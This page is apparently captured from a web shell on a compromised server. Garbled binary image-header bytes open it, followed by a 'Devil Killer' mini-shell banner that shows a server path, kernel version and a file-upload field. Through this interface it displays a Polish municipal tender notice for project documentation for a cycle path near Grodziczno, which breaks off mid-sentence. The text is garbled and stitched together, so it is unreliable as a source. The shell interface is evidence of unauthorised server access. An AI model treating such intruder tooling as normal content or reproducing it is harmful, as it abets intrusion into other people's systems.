JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240423/0029779201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa opracowania dokumentacji projektowo – kosztorysowej na „Budowę ścieżki pieszo – rowerowej na odcinku Linowiec (gr. gminy) – Kuligi (DW 538)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Grodziczno</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Grodziczno</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118900</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodziczno 17a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grodziczno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">13-324</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">564729722</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">benia@grodziczno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.grodziczno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa opracowania dokumentacji projektowo – kosztorysowej na „Budowę ścieżki pieszo – rowerowej na odcinku Linowiec (gr. gminy) – Kuligi (DW 538)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97b0c36d-008c-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00297792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00001191/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowo-kosztorysowej na &#34;Budowę ścieżki pieszo-rowerowej na odcinku Linowiec (gr.Gminy) - Kuligi (DW538)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/ug_grodziczno <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/ug_grodziczno</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim w formie elektronicznej za pośrednictwem plat-formazakupowa.pl pod adresem: Profil Nabywcy - Gmina Grodziczno<br/>(platformazakupowa.pl). Wymagany podpis kwalifikowany/zaufany/osobisty)<br/>W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a Wykonawcami, w<br/>tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane były za pośrednictwem platformazakupowa.pl i<br/>formularza „Wyślij wiadomość do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość<br/>do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza,<br/>opcjonalnie, komunikację za pośrednictwem poczty elektronicznej.<br/>Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl.<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na<br/>platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może<br/>trafić do folderu SPAM.<br/>Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia Prezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego oraz udostępnienia i przechowywania dokumentów elektronicznych określa<br/>niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl,<br/>Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl,<br/>w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie<br/>oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i<br/>nie będzie brana pod uwagę w przedmiotowym postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221<br/>Ustawy Prawo Zamówień Publicznych.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej: RODO, Zamawiający informuje, że:<br/>a) administratorem Pani(a) danych osobowych jest podmiot wskazany w pkt. I ppkt. 1 i 2 niniejszego<br/>Rozdziału SWZ,<br/>b) kontakt z inspektorem ochrony danych osobowych u Zamawiającego można uzyskać pod adresem email: iod@grodziczno.pl,<br/>c) Pani(a) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego,<br/>d) odbiorcami Pani(a) danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 ustawy,<br/>e) Pani(a) dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekroczy 4 lata – okres przechowywania obejmie cały czas trwania umowy (art. 78 ust. 4 ustawy),<br/>f) obowiązek podania przez Panią(a) danych osobowych bezpośrednio Pani(a) dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy,<br/>g) w odniesieniu do Pani(a) danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO.<br/>2. Posiada Pan(i):<br/>a) na podstawie art. 15 RODO – prawo dostępu do danych osobowych Pani(a) dotyczących (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia),<br/>b) na podstawie art. 16 RODO – prawo do sprostowania Pani(a) danych osobowych, przy czym skorzystanie z tego prawa nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą oraz nie może naruszać integralności protokołu oraz jego załączników,<br/>c) na podstawie art. 18 RODO – prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo to nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na<br/>ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d) prawo do wniesienia skargi do organu nadzorczego, gdy uzna Pan(i), że przetwarzanie danych osobowych Pani(a) dotyczących<br/>narusza przepisy RODO – organem tym jest Prezes Urzędu Ochrony Danych Osobowych z siedzibą przy ul. Stawki 2, 00-193<br/>Warszawa.<br/>3. Nie przysługuje Pani(u):<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO – prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO – prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>przekazanych danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 8 a ust. 5 ustawy Pzp Zamawiający informuje, że:<br/>1) W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego<br/>wysiłku, Zamawiający może żądać od osobowy, której dane dotyczą, wskazania do takowych informacji, mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielnie zamówienia publicznego lub konkursu<br/>(art. 8a ust. 2 ustawy Pzp);<br/>2) Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielnie zamówienia publicznego lub konkursu (art. 8a ust. 4 ustawy Pzp)<br/>3) W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego<br/>wysiłku, zamawiający może żądać od osoby. Której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na<br/>celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia (art. 97 ust. 1a ustawy Pzp).<br/>Obowiązek informacyjny Wykonawcy<br/>1) W przypadku, gdy Wykonawca ubiegający się o udzielenie zamówienia publicznego pozyskał bezpośrednio lub pośrednio dane<br/>osobowe osób fizycznych, których te dane dotyczą i które przekazuje Zamawiającemu, jest zobowiązany do wypełnienia obowiązku<br/>informacyjnego względem tych osób, wynikającego z art. 13 i art. 14 RODO.<br/>2) W przypadku, o którym mowa w pkt 1 Wykonawca jest zobowiązany do złożenia oświadczenia o następującej treści:<br/>„Oświadczam(y), że w wypełniłem(liśmy) obowiązki informacyjne przewidziane w art. 13 lub art. 14 RODO wobec osób fizycznych,<br/>od których dane osobowe bezpośrednio lub pośrednio pozyskałem(liśmy)w celu ubiegania się o udzielnie zamówienia publicznego w<br/>niniejszym postępowaniu”.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IP.271.1.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie dokumentacji projektowo – kosztorysowej na budowę ścieżki pieszo-rowerowej wraz ze zjazdami, połączenia z wybudowaną ścieżką pieszo-rowerową na terenie gminy Nowe Miasto Lubawskie oraz włączenia do drogi wojewódzkiej nr 538 w miejscowości Kuligi, odwodnienia nawierzchni, opracowanie projektu stałej organizacji ruchu, uzgodnienie projektu z Zarządcami dróg wyższych kategorii w zakresie włączenia ścieżki do drogi publicznej, rozbudowę, budowę, przebudowę lub remont obiektów inżynierskich w dostosowaniu do projektu budowy ścieżki pieszo – rowerowej oraz ich oznakowania.<br/>2.	Stan istniejący: Teren po byłym torze kolejowym w przeważającej części wykorzystywany jest jako droga dojazdowa do gruntów rolnych przez lokalnych rolników. Na odcinku około 300 mb szlak jest nieprzejezdny, zarośnięty drzewami i krzewami, które przed przystąpieniem do realizacji inwestycji należy uporządkować. Szerokość pasa terenu kolejowego wacha się od 7,0 – 47,0 m nawierzchnia nieutwardzona wzmocniona żwirem i pospółką po zebraniu kruszywa z torowiska.<br/>3.	W ciągu projektowanej ścieżki pieszo-rowerowej w km 0+700 znajduje się obiekt mostowy kolejowy, przez rzekę Wel, wykorzystywany dla lokalnego ruchu pojazdów rolniczych jak i samochodowych, który wymagać będzie wykonania ekspertyzy, pomiarów nośności oraz renowacji całej stalowej konstrukcji oraz przystosowania do potrzeb ścieżki pieszo-rowerowej przy projektowaniu nowej nawierzchni, a także przystosowanie do ruchu drogowego.<br/>4.	Na dalszym odcinku w km 1+280 znajdują się niekompletne elementy mostu kolejowego przez ciek wodny struga Wólka, którego konstrukcja w obecnym stanie nie nadaje się do użytkowania. Należy rozpatrzeć przebudowę na przepust o przekroju dostosowanym do ilości przepływu wód.<br/>5.	Założenia projektowe: Należy zaprojektować nawierzchnię utwardzoną asfaltobetonem na podbudowie, ograniczoną obrzeżem betonowym oraz utwardzonym poboczem o szer. 0,50 m wzmocnionym kruszywem łamanym, odwodnienie poprzez spadki poprzeczne i podłużne na teren przyległy do ścieżki, szerokość jezdni pieszo-rowerowej 2,5 – 3,0 m.<br/>6.	Ujęcie w projekcie odcinków ścieżki rowerowej do ruchu pojazdów mechanicznych w tym maszyn rolniczych poprzez przygotowanie wzmocnionej podbudowy i nawierzchni w miejscach ustalonych z Zamawiającym oraz skrzyżowań z drogami wewnętrznymi przyległymi do ścieżki pieszo-rowerowej.<br/>7.	Założenia projektowe winny zawierać możliwości lokalizacji i budowy obiektów małej architektury (wiaty, parking, ławki, licznik)<br/>8.	Do Wykonawcy należy:<br/>1) Sporządzenie wniosku, materiałów do wniosku i na podstawie upoważnienia Wójta Gminy Grodziczno uzyskanie opinii do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji<br/>celu publicznego.<br/>2) Sporządzenie operatów wodnoprawnych oraz uzyskanie decyzji pozwolenia wodnoprawnego na wykonanie wszystkich urządzeń wodnych (rozbudowa, przebudowa, budowa) oraz odprowadzenie wód - na podstawie upoważnienia.<br/>3) Uzyskanie wszelkich innych decyzji, uzgodnień i opinii niezbędnych do opracowania PB + PW<br/>oraz do uzyskania decyzji o zezwoleniu na realizację inwestycji.<br/>4) Uzyskanie aktualnej numerycznej mapy do celów projektowych w formie elektronicznej i papierowej w skali 1:500 w zakresie niezbędnym do opracowania projektu<br/>5) Uzyskanie aktualnych warunków na budowę, przebudowę sieci infrastruktury towarzyszącej, sieci uzbrojenia terenu kolidującej z budową ścieżki pieszo-rowerowej.<br/>6) Wykonawca będzie zobowiązany do pełnienia nadzoru autorskiego w ilości niezbędnej do prawidłowego wykonania robót budowlanych. Termin realizacji robót budowlanych objętych przedmiotem zamówienia szacuje się na ok. 24 miesięcy. <br/>7) Zakres nadzoru autorskiego zostanie określony w istotnych dla stron postanowieniach umowy<br/>8) Odbiór dokumentacji projektowo-wykonawczej i przetargowej został szczegółowo określony w istotnych dla stron postanowieniach umowy <br/>9) Poszczególne elementy dokumentacji projektowej każdej branży powinny być sprawdzone przez osobę posiadającą uprawnienia budowlane. Do projektów budowlanych i wykonawczych<br/>należy dołączyć:<br/>a) kopie uprawnień budowlanych projektanta i sprawdzającego,<br/>b) kopie opinii ZUDP,<br/>c) kopie wszelkich decyzji, uzgodnień i opinii niezbędnych do uzyskania decyzji zezwalającej na<br/>realizację inwestycji, wynikające z przepisów prawa,<br/>d) oświadczenie projektanta i sprawdzającego, że opracowanie zostało wykonane zgodnie z umową, obowiązującymi przepisami, zasadami wiedzy technicznej i jest kompletne z punktu widzenia celu, któremu ma służyć zgodnie z art. 20 Prawa Budowlanego.<br/>10) W ramach umowy Wykonawca na wniosek Zamawiającego, dwukrotnie uaktualni (bez wynagrodzenia) kosztorys inwestorski w oparciu o poziom cen występujący w tym czasie zgodnie z PZP.<br/>9.	Dokumentacja projektowa oraz projekt wykonawczy winien być kompletny z wymaganymi przepisami prawa uzgodnieniami, pozwoleniami niezbędnymi do uzyskania pozwolenia na budowę. Wykonanie wszelkich pomiarów, ekspertyz niezbędnych dla prawidłowego wykonania dokumentacji projektowo – kosztorysowej.<br/>1)	opracowanie aktualnej mapy sytuacyjno – wysokościowej do celów projektowych.<br/>2)	Wykonanie wszelkich pomiarów, ekspertyz niezbędnych dla prawidłowego wykonania dokumentacji projektowo – kosztorysowej.<br/>3)	Koniec zadania stanowi termin złożenia dokumentów w sekretariacie UG Grodziczno w stanie kompletnym oraz złożonym wnioskiem do uzyskania prawomocnego pozwoleniem na budowę wydanego przez Starostę Nowomiejskiego.<br/>4)	Projektant przed rozpoczęciem ostatecznych prac projektowych uzgodni z Zamawiającym koncepcję oraz zakres opracowania w celu uzyskania jego akceptacji.<br/>5)	Teren inwestycji nie jest objęty planem zagospodarowania przestrzennego.<br/>6)	Wykonawca otrzyma od Zamawiającego pełnomocnictwo do reprezentowania inwestora<br/>10.	Do Wykonawcy należeć będzie w szczególności:<br/>1)	Wykonanie usługi zgodnie z obowiązującymi przepisami i normami przewidzianymi dla tych robót w uzgodnieniu z inwestorem.<br/>2)	Pełnienie nadzoru autorskiego w rozumieniu art. 20 ustawy z dnia 7 lipca 1994r. Prawo Budowlane<br/>11.	W szczególnie uzasadnionych przypadkach, takich jak:<br/>1)	zmiany przepisów prawnych, mających wpływ na termin wykonania Umowy,<br/>2)	przedłużających się procedur postępowaniami administracyjnymi i innymi postępowaniami przed organami administracji publicznej, powyżej terminów ustawowych.<br/>3)	wydania decyzji, postanowień lub innych aktów administracyjnych mających wpływ na wykonanie Przedmiotu Umowy, w tym wstrzymaniu robót, Zamawiający może przedłużyć termin wykonania zamówienia.<br/>12.	Przebudowa obejmuje poniższy zakres robót:<br/>1)	Roboty w zakresie burzenia i rozbiórki obiektów budowlanych, roboty ziemne,<br/>2)	Roboty ziemne wykonywane w rejonie działek przewidzianych do realizacji zadania<br/>3)	Roboty w zakresie nawierzchni ścieżki pieszo-rowerowej, dróg dojazdowych do ścieżki pieszo-rowerowej i do obiektów mostowych,<br/>4)	Roboty budowlane w zakresie przebudowy, odbudowy czy budowy obiektów mostowych w ciągu ścieżki pieszo-rowerowej,<br/>5)	Oznakowanie ścieżki pieszo-rowerowej, dojazdów do ścieżki, włączenia się do drogi wojewódzkiej nr 538 w miejscowości Kuligi, przez opracowanie projektu stałej organizacji ruchu.<br/>13.	Informacje dodatkowe<br/>1)	Sporządzona dokumentacja przez Wykonawcę będzie wykorzystywana w procesach udzielenia zamówień publicznych, dlatego też powinna być dostępna cyfrowo, ponieważ wymagają tego przepisy prawa zawarte w Ustawie z dnia 4 kwietnia 2019 roku o dostępności cyfrowej stron internetowych i aplikacji mobilnych podmiotów publicznych (Dz. U. 2023 poz. 1440). Wykonawca sporządzając dokumentację musi zapewnić dostępność cyfrową tekstowej części dokumentacji.<br/>2)	Zamawiający nie wymaga, aby Wykonawca dokonał wizji lokalnej na terenie realizacji projektu, przed wykonaniem wyceny dokumentacji projektowej.<br/>3)	Zamawiający udzieli Wykonawcy pełnomocnictwa do występowania w jego imieniu z wnioskami o uzyskanie niezbędnych decyzji, pozwoleń, postanowień, zezwoleń i opinii, po wcześniejszym wystąpieniu do Zamawiającego o ich udzielenie.<br/>4)	Projektant przed rozpoczęciem ostatecznych prac projektowych uzgodni plan sytuacyjny oraz zakres opracowania z Zamawiającym w celu uzyskania jego akceptacji.<br/>5)	Teren inwestycji nie jest objęty planem zagospodarowania przestrzennego.<br/>6)	Wykonawca otrzyma od Zamawiającego pełnomocnictwo do reprezentowania inwestora<br/>14.	W zakres dokumentacji projektowo-kosztorysowej wchodzą:<br/>1)	Prace geodezyjne – sporządzenie map do celów projektowych do planowanego zakresu budowy ścieżki pieszo-rowerowej i uzyskania pozwolenia na 